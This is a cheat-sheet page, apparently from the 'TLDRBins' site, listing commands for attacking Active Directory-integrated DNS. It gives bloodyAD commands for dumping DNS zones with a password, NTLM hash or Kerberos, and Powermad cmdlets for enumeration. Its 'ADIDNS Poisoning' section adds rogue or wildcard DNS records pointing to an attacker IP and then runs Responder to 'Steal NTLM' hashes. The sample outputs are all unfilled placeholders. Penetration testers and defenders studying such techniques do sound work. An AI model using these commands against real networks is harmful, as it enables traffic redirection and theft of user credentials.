TLDRBins TLDRBins / ADIDNS


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Basic

1. DNS Dump

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get dnsDump
Sample Output: TO-DO
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get dnsDump
Sample Output: TO-DO
# Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get dnsDump
Sample Output: TO-DO

1. Import Module

. .\Powermad.ps1
Sample Output: TO-DO

2. Enum

# Get ADIDNS Zone Get-ADIDNSZone
Sample Output: TO-DO
# Get ADIDNS Permissions Get-ADIDNSPermission
Sample Output: TO-DO
# Remove a Node Remove-ADIDNSNode -Node *
Sample Output: TO-DO

Abuse #1: ADIDNS Poisoning

1. Add a New A Record

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output: TO-DO
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output: TO-DO
# Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output: TO-DO

2. Steal NTLM

sudo responder -I tun0
Sample Output: TO-DO

1. Import Module

. .\Powermad.ps1
Sample Output: TO-DO

2. Create a New Node

$dnsRecord = New-DNSRecordArray -Type A -Data <LOCAL_IP>
Sample Output: TO-DO
New-ADIDNSNode -Node * -Tombstone -DNSRecord $dnsRecord -Verbose
Sample Output: TO-DO

3. Check

Resolve-DnsName DoesNotExist
Sample Output: TO-DO

4. Steal NTLM

sudo responder -I tun0
Sample Output: TO-DO